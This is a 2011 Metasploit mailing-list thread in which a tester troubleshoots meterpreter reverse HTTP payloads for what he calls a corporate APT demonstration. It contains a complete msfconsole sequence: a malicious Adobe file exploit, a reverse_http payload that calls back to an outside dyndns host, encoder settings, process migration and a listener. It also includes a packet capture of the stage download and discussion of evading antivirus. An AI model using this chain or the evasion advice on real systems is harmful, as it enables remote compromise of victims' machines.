Re: Meterpreter Reverse HTTP(s) Payloads after last update

[Enis Sahin <enis.c.sahin () gmail com>]

I just realized that there is already a bug open for it (BUG#4928).

I'll be able to re-test it on monday morning with the latest version with AV
disabled and share my findings.

Enis


On 30 September 2011 22:47, Enis Sahin <enis.c.sahin () gmail com> wrote:

> Sherif,
>
> I didn't record the output of my console but it was the same as your
> output. Session 1 opened...Then nothing. I manually interact with the
> session and commands like sysinfo are not recognized. However I have the
> packet capture (I'll paste it below) and the I used the following commands
> exactly while I created the exploit and the listener:
>
> use exploit/windows/fileformat/adobe_cooltype_sing
> set payload windows/meterpreter/reverse_http
> set lport 80
> set lhost "my internal portforwarded IP"
> set encoders x86/shikata_ga_nai -c 12
> set InitialAutoRunScript run migrate.rb explorer.exe
> exploit
> back
> use multi/handler
> set payload windows/meterpreter/reverse_http
> set lport 80
> set lhots "my dyndns url"
> exploit -j
>
> And here's the packet capture (I'm snipping most of it but these parts
> seemed relevant to me)
>
> GET /INITM HTTP/1.1
> Host: XXXX.dyndns.com
> Pragma: no-cache
> Connection: Keep-Alive
> User-Agent: wininet
>
> HTTP/1.1 200 OK
> Content-Type: application/octet-stream
> Content-Length: 752128
> Server: Rex
> Connection: Keep-Alive
>
> MZ.....[REU............Wh....P..h..*
> h....P.............................!..L.!This program cannot be run in DOS
> mode.
> ....
> CorExitProcess..m.s.c.o.r.e.e...d.l.l...runtime error ..
> ..TLOSS error
> ...SING error
> ....DOMAIN error
> ......R6034
> An application has made an attempt to load the C runtime library
> incorrectly.
> Please contact the application's support team for more information.
> ......R6033
> - Attempt to use MSIL code from this assembly during native code
> initialization
> This indicates a bug in your application. It is most likely the result of
> calling an MSIL-compiled (/clr) function from a native constructor or from
> DllMain.
> ..R6032
> - not enough space for locale information
> ......R6031
> - Attempt to initialize the CRT more than once.
> This indicates a bug in your application.
> ..R6030
> - CRT not initialized
> ..R6028
> - unable to initialize heap
> ....R6027
> - not enough space for lowio initialization
> ....R6026
> - not enough space for stdio initialization
> ....R6025
> - pure virtual function call
> ...R6024
> - not enough space for _onexit/atexit table
> ....R6019
> - unable to open console device
> ....R6018
> - unexpected heap error
> ....R6017
> - unexpected multithread lock error
> ....R6016
> - not enough space for thread data
> .
> This application has requested the Runtime to terminate it in an unusual
> way.
> Please contact the application's support team for more information.
> ...R6009
> - not enough space for environment
> .R6008
> - not enough space for arguments
> ...R6002
> - floating point support not loaded
> ....Microsoft Visual C++ Runtime Library....
>
> ......<program name unknown>..Runtime Error!
>
> Program:
> ....@...A..EncodePointer...DecodePointer...FlsFree.FlsSetValue.FlsGetValue.FlsAlloc............................................................................................................................e+000.......~.PA......GAIsProcessorFeaturePresent...KERNEL32....(.n.u.l.l.).....(null)...................EEE.....50.P...
>
>
> They are all detected by AV now so I'll probably try to do the simulation
> with a web based exploit and hope that the payload doesn't get detected when
> it doesn't get written to disk (web gateway is quite good about catching
> exploit packs and hex encoded characters coming in with HTTP so it will be
> the exploit which triggers alarms this time probably but we'll see...).
>
>
>
>
>
> On 30 September 2011 17:06, Sherif El-Deeb <archeldeeb () gmail com> wrote:
>
> > Last time I asked for help, I attached console output, my configurations,
> > and everything I felt will help defining the issue, I suggest you do the
> > same.
> >
> > About the AV detection issue, just google "evading av with metasploit",
> > and you will eventually come to the conclusion that if you want your stuff
> > to become undetected, you will HAVE TO CODE SOMETHING ON YOUR OWN, period.
> >
> > connection issues: plz provide more info.
> > Regards,
> > On Sep 30, 2011 4:48 PM, "Enis Sahin" <enis.c.sahin () gmail com> wrote:
> > > Oh and additional information.
> > >
> > > I've tried using the previous version of the payload since it still
> > doesn't
> > > get detected by AV. But, setting the lhost in multi/handler to the
> > actual
> > > IP, dyndns URL of the Modem and 0.0.0.0 results in the same connection
> > > problem.
> > >
> > >
> > >
> > > On 30 September 2011 16:06, Enis Sahin <enis.c.sahin () gmail com> wrote:
> > >
> > > > Hi everybody,
> > > >
> > > > I've had the chance to test the windows/meterpreter/reverse_http
> > payload
> > > > for an APT demonstration project in a conrporate environment recently.
> > > >
> > > > Before the update on September 23 both the http and https versions had
> > > > connection problems upon session connection, it would go idle and
> > session
> > > > wouldn't accept any commands. The Wireshark capture show that the
> > initial
> > > > response packet had the error "This program cannot be run in Dos mode".
> > But
> > > > it was undetected by the AV solution used.
> > > >
> > > > After the update, the AV immediately detects the malicious file as soon
> > as
> > > > it is extracted from the zip file. I know that the AV detects the
> > reverse
> > > > http payload because using the same fileformat exploit with a reverse
> > tcp
> > > > connection payload doesn't get detected. The same goes for the previous
> > > > version of the paylod, I still have the version with connection
> > problems (in
> > > > a file created with the same file format exploit) and it stays
> > undetected on
> > > > the desktop.
> > > >
> > > > As a side note I've used the same encoding for all payloads I've tried
> > to
> > > > be able to identify the reason for detection.
> > > >
> > > > Any ideas about why the payload gets detected after the update?
> > > >
> > > > Thanks.
> > > > Enis
> > > >
> > > > --
> > > > http://www.enissahin.com | http://twitter.com/enis_sahin
> > >
> > >
> > > --
> > > http://www.enissahin.com | http://twitter.com/enis_sahin
>
>
>
> --
> http://www.enissahin.com | http://twitter.com/enis_sahin


-- 
http://www.enissahin.com | http://twitter.com/enis_sahin

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework